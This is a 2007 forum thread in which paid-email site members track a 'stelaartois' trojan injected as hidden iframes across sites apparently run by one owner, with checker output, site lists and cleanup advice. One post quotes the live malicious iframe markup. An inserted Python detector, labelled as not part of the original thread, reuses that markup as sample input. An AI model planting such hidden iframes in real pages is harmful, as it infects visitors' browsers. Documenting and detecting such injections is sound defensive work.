Full Version: Trojans on Genelle's sites (in list)
wagdoll
I had a littlecountryplace page with the stelaartois trojan and went to report it to butterflies n roses where as it was in their PTP got hit by it there too on the report page. toybox was reported earlier as having this back again, assume all Genelle's sites have it again, they are usually all hit together and there's too many of them to go run through Jutaky's checker individually.

CODE
(Level: 0) Url checked:
http://littlecountryplace.com
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
http://www.stelaartois.ru/index2.php
Zeroiframes detected on this site: 0
No ad codes identified
the lil crusader
It's on Kerosene Cucumber too:

QUOTE(IframeChecker)
No zeroiframes detected!
Check took 4.15 seconds

(Level: 0) Url checked:
http://www.thekerosenecucumber.com
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
http://www.stelaartois.ru/index2.php
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
http://www.stelaartois.ru/index2.php
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
http://www.stelaartois.ru/index2.php
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
http://www.kissdesign.net/calendriers/025/code.js
Blank page / could not connect
sophieca
Does someone have a list of Genelle's sites?

Is she fixing this?

Thanks
wagdoll
I was also wondering these things Sophie. Last time it happened I did go through her sites with Jutaky's detektor and grabbed site lists from the code. I wrote to her using generic email addresses for several of the sites (support@ and webmaster@) but didn't receive any replies so I have no idea if she even got my messages. I can't visit sites that have this on them to send them a support form, so I have no way to let them know unless an address like that works, and I don't know if the address works unless they reply.

I believe these are amongst Genelle's sites, that she owns or runs or hosts. Apologies for any errors.

hummingbirdsnroses.com
PrancingPenguins
CountryRedneck
SugarLandCash
SweetClickers
CatMails
ButterfliesNRoses
MotherEarthMails
BigDaddyMails
PoolHallPTR
TheToyBoxOnline
purringemail.com
KeroseneCucumber
thelittlestpenguins.com
Foxden
LittleCountryPlace
Pactech hosting
drunkenpenguins

I don't think that is a complete list.

I believe heavenlyemail and destinysdollars are now on pactech hosting and also getting hit when Genelle's get hit recently, although they are not owned by her.
wagdoll
I just checked thetoyboxonline and littlecountryplace and they are both now clean. I have not checked the rest of the sites.
taf
QUOTE(wagdoll @ Feb 6 2007, 04:39 PM)
I just checked thetoyboxonline and littlecountryplace and they are both now clean. I have not checked the rest of the sites.


thank you Wagdoll for the warning,
I am happy to say I am only a member at one site of Genelle's - mother earth- which she acquired during the allen fan club transfer, but she seems never to send mails on it, including my gold ads, LOL.
sophieca
Thanks for the list wagdoll, going to check them now. If they are still infected, I'll add them to the alphabetical list, otherwise I'll leave it at that, but as they seem to be a regular target, we'll keep an eye on it.

hummingbirdsnroses.com fixed - nothing on homepage
PrancingPenguin fixed - nothing on homepage
CountryRedneck fixed - nothing on homepage
SugarLandCash fixed - nothing on homepage
SweetClickers fixed - nothing on homepage
CatMails fixed - nothing on homepage
ButterfliesNRoses fixed - nothing on homepage
MotherEarthMails fixed - nothing on homepage
BigDaddyMails fixed - nothing on homepage
PoolHallPTR fixed - nothing on homepage
TheToyBoxOnline fixed - nothing on homepage
purringemail.com fixed - nothing on homepage
KeroseneCucumber fixed - nothing on homepage
thelittlestpenguins.com fixed - nothing on homepage
Foxden Googled this one but couldn't find which one was the right one
LittleCountryPlace fixed - nothing on homepage
Pactech hosting fixed - nothing on homepage
drunkenpenguins fixed - nothing on homepage

Candyred32
QUOTE(wagdoll @ Feb 5 2007, 06:23 AM)
I was also wondering these things Sophie. Last time it happened I did go through her sites with Jutaky's detektor and grabbed site lists from the code. I wrote to her using generic email addresses for several of the sites (support@ and webmaster@) but didn't receive any replies so I have no idea if she even got my messages. I can't visit sites that have this on them to send them a support form, so I have no way to let them know unless an address like that works, and I don't know if the address works unless they reply.

I believe these are amongst Genelle's sites, that she owns or runs or hosts. Apologies for any errors.

hummingbirdsnroses.com
PrancingPenguins
CountryRedneck
SugarLandCash
SweetClickers
CatMails
ButterfliesNRoses
MotherEarthMails
BigDaddyMails
PoolHallPTR
TheToyBoxOnline
purringemail.com
KeroseneCucumber
thelittlestpenguins.com
Foxden
LittleCountryPlace
Pactech hosting
drunkenpenguins

I don't think that is a complete list.

I believe heavenlyemail and destinysdollars are now on pactech hosting and also getting hit when Genelle's get hit recently, although they are not owned by her.


Genelle also owns GroovyPaidEmails.biz
trekkiesg
stellaartois is back...

littlecountryplace.com - infected
thelittlestpenguins.com - infected
thetoyboxonline - infected

had to refresh a few times but the nasty is definitely there.
not sure about the others.

have alerted her about this + alerted her about this thread
anyyan
stelaartois.ru 5x5 iframe freezing browser and download ActiveX still on thelittlestpenguins.

I came across it on Sparky's PTP. Reported to Tipsy.

Not sure of other sites.
cubster
It is definitely still on thetoyboxonline.
sophieca
I had it too on the penguin PTP one, does anyone know the quickest way to inform Genelle?
trekkiesg
this is the reply I got from them.
So they are aware of the issue and are working on it:


QUOTE
---------- Forwarded message ----------
From: support@thetoyboxonline.com <support@thetoyboxonline.com>
Date: Mar 16, 2007 9:41 PM
Subject: Re: Other

Hi,

We are looking into this. Thank you for alerting us to this situation.


Kathy


Quoting trekkiesg:

>
> name: trekkiesg
>
> username: n/a
>
> bquestion_type: stellaartois on your sites
>
> message_type: hi Genelle,
>
> your sites are infected with the Stellaartois trojan.
>
> you might want to check through them. I did not check all the sites,
> only this one, littlecountryplace, thelittlestpenguins, all of
> which are affected.
>
> There is a thread at Getpaidforum so you can update us there:
> http://getpaidforum.com/forums/index.php?showtopic=478263
OurPTR2
There are now three stellaartois showing on thelittlestpenguins.com.
mcf
QUOTE(wagdoll @ Feb 5 2007, 07:23 AM)
I was also wondering these things Sophie. Last time it happened I did go through her sites with Jutaky's detektor and grabbed site lists from the code. I wrote to her using generic email addresses for several of the sites (support@ and webmaster@) but didn't receive any replies so I have no idea if she even got my messages. I can't visit sites that have this on them to send them a support form, so I have no way to let them know unless an address like that works, and I don't know if the address works unless they reply.

I believe these are amongst Genelle's sites, that she owns or runs or hosts. Apologies for any errors.

hummingbirdsnroses.com
PrancingPenguins
CountryRedneck
SugarLandCash
SweetClickers
CatMails
ButterfliesNRoses
MotherEarthMails
BigDaddyMails
PoolHallPTR
TheToyBoxOnline
purringemail.com
KeroseneCucumber
thelittlestpenguins.com
Foxden
LittleCountryPlace
Pactech hosting
drunkenpenguins

I don't think that is a complete list.

I believe heavenlyemail and destinysdollars are now on pactech hosting and also getting hit when Genelle's get hit recently, although they are not owned by her.

How can she manage so many sites? Guess the answer is "not".
Spare-Dollars
QUOTE(trekkiesg @ Mar 15 2007, 08:44 AM)
stellaartois is back...

littlecountryplace.com - infected
thelittlestpenguins.com - infected
thetoyboxonline - infected

had to refresh a few times but the nasty is definitely there.
not sure about the others.

have alerted her about this + alerted her about this thread



Looks like littlecountryplace.com is clean but now pactech-hosting.com is infected.

QUOTE
(Level: 0) Url checked:
http://www.pactech-hosting.com
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
http://www.stelaartois.ru/index2.php
Zeroiframes detected on this site: 0
No ad codes identified


cconniejean
QUOTE
No zeroiframes detected!
Check took 3.33 seconds

(Level: 0) Url checked:
htt://bigdaddymails.com/pages/index.php?refid=
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
htt://stelaartois.ru/index2.php
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
htt://stelaartois.ru/index2.php
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
htt://stelaartois.ru/index2.php
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
htt://adreporting.com/rotate/rotate.php?aid=685290&rid=4
Zeroiframes detected on this site: 0
No ad codes identified
wagdoll
Prancing penguin also infected. Sent contact form.

CODE
<IFRAME name="StatPage" src="http://stelaartois.ru/index2.php" width=5 height=5 style="display:none"></IFRAME><table width="100%" border="0" cellspacing="5" cellpadding="5" align="CENTER">

<a href=http://www.prancingpenguin.com/pages/ <IFRAME name="StatPage" src="http://stelaartois.ru/index2.php" width=5 height=5 style="display:none"></IFRAME>

<IFRAME name="StatPage" src="http://stelaartois.ru/index2.php" width=5 height=5 style="display:none"></IFRAME>
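
A defender-side check for the markup posted above, as an added example that is not part of the original thread: it flags iframes that are hidden (display:none, or at most 5 pixels wide or high, a threshold assumed here) and load from a host other than the site's own. The function names and the last two sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Regex rather than a tag-tree parser: in the second line of the posted markup
# the iframe was written inside an unfinished <a ...> tag.
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR_RE = re.compile(r"""([a-z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.I)
MAX_HIDDEN_PX = 5  # assumption: covers the 5x5 frames above and 0x0 "zeroiframes"

# First two lines are taken (shortened) from the post; the last two are constructed, benign.
SAMPLE = """<IFRAME name="StatPage" src="http://stelaartois.ru/index2.php" width=5 height=5 style="display:none"></IFRAME><table width="100%">
<a href=http://www.prancingpenguin.com/pages/ <IFRAME name="StatPage" src="http://stelaartois.ru/index2.php" width=5 height=5 style="display:none"></IFRAME>
<iframe src="http://www.prancingpenguin.com/pages/banner.php" width=468 height=60></iframe>
<iframe src="http://ads.example.net/rotate.php" width="468" height="60"></iframe>
"""


def parse_attrs(raw):
    """Return lower-cased attribute names mapped to their values."""
    attrs = {}
    for m in ATTR_RE.finditer(raw):
        attrs[m.group(1).lower()] = next(g for g in m.groups()[1:] if g is not None)
    return attrs


def is_hidden(attrs):
    """True if the frame is styled invisible or is at most MAX_HIDDEN_PX wide/high."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    return any(attrs.get(d, "").isdigit() and int(attrs[d]) <= MAX_HIDDEN_PX
               for d in ("width", "height"))


def find_hidden_iframes(html, site_host):
    """List (line, host) for each hidden iframe whose src is off site_host."""
    findings = []
    for m in IFRAME_RE.finditer(html):
        attrs = parse_attrs(m.group(1))
        host = (urlparse(attrs.get("src", "")).hostname or "").lower()
        if not host or host == site_host or host.endswith("." + site_host):
            continue  # relative or same-site frame
        if is_hidden(attrs):
            findings.append((html.count("\n", 0, m.start()) + 1, host))
    return findings


if __name__ == "__main__":
    for line, host in find_hidden_iframes(SAMPLE, "prancingpenguin.com"):
        print(f"line {line}: hidden iframe loading from {host}")
```

Run against saved copies of the page source rather than a live browser visit, so the check itself never renders the frame.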


XostedMomof3
HI All-

Ok, Billi Here ;-) I have been hit by this nasty too so my sites are in suspended mode right now until I can clean this out or until my host can. We are both working at this, but it seems they are coming back as soon as we clean them so does anyone know how to block this guy? I mean anyone with any ideas how to stop these from being inserted PLEASE PM me lol. I would greatly appreciate the help. Thanks so much!!

Billi

Ami's House
AIM Paid 2 Read
Medieval Mails
Lillyth's Magick Mails
XostedMom's Place
wagdoll
Are you aware that the suspended page also has the trojan on it? I also read that due to this suspended hosting page redirect, that any sites that have banners up for the affected sites are also infected with the trojan. Is there any chance they can be taken offline totally until the suspended page is cleaned - too many people are not protected or even being informed about this trojan.

There's some advice on this site for cleaning it from the server

http://help.lockergnome.com/security/Javas...opict10748.html

Also everyone who has cpanel access needs to scan their own computers and make sure they are clean before going back in there. You could try adding the stelaartois domain to your hosts file on the PC and for the server/cpanel (I don't know the terminology for server stuff), and if you all stay out of the cpanels you might be able to see the IP that the stuff is coming from if it is from an external source rather than staying in the system and just self-reinfecting. Self reinfecting sounds most likely unless there is a cpanel vulnerability that is being hit over and over. If it is coming from an outside IP then that should be blocked at the server level. Also make sure there's no 777 permissions being left open.

I apologise if this is no good, but as I say I don't know anything about servers

sophieca
Good luck to you XostedMomof3 !


And here we go again littlecountryplace has now 6 of them !
CODE
No zeroiframes detected!
Check took 3.89 seconds

(Level: 0) Url checked:
http://www.littlecountryplace.com/pages/index.php?refid=
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
http://stelaartois.ru/index2.php
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
http://stelaartois.ru/index2.php
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
http://stelaartois.ru/index2.php
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
http://stelaartois.ru/index2.php
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
http://stelaartois.ru/index2.php
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
http://stelaartois.ru/index2.php
Zeroiframes detected on this site: 0
No ad codes identified
XostedMomof3
Thanks for the info hun, I have passed it on. Hopefully we will get somewhere with this. IT IS SO FRUSTRATING!!!
gen328
That link goes to a 404 not found..
sophieca
It brings me to a forum, maybe if I repost it :
link

Good luck
wagdoll
http://getpaidforum.com/forums/index.php?showtopic=482717

New hack on one of Genelle's sites. It has a new domain, not stelaartois this time